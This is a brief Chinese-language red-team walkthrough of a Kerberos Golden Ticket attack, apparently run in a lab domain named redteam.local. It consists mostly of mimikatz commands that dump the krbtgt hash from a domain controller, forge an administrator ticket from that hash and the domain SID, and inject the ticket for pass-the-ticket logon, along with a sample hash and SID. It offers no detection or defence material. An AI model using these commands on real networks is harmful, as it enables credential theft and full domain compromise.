0x01 金票
可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。
1.1 收集krbtgt密码信息
privilege::debug
lsadump::lsa /inject /name:krbtgt
得到krbtgt的hash:
c73caed3bc6f0a248e51d37b9a8675fa
域sid值:
S-1-5-21-151877218-3666268517-4145415712
1.2 金票利用
使用mimikatz伪造kerberos票证
生成gold.kribi
mimikatz "kerberos::golden /domain:redteam.local /sid:S-1-5-21-151877218-3666268517-4145415712
/krbtgt:c73caed3bc6f0a248e51d37b9a8675fa /user:administrator
/ticket:gold.kirbi"
可以看到没有任何票证。
导入gold.kribi
kerberos::ptt C:\Users\jack\Desktop\gold.kirbi
成功导入administrator票据。
可以通过事件管理器查看到是以administrator来登录的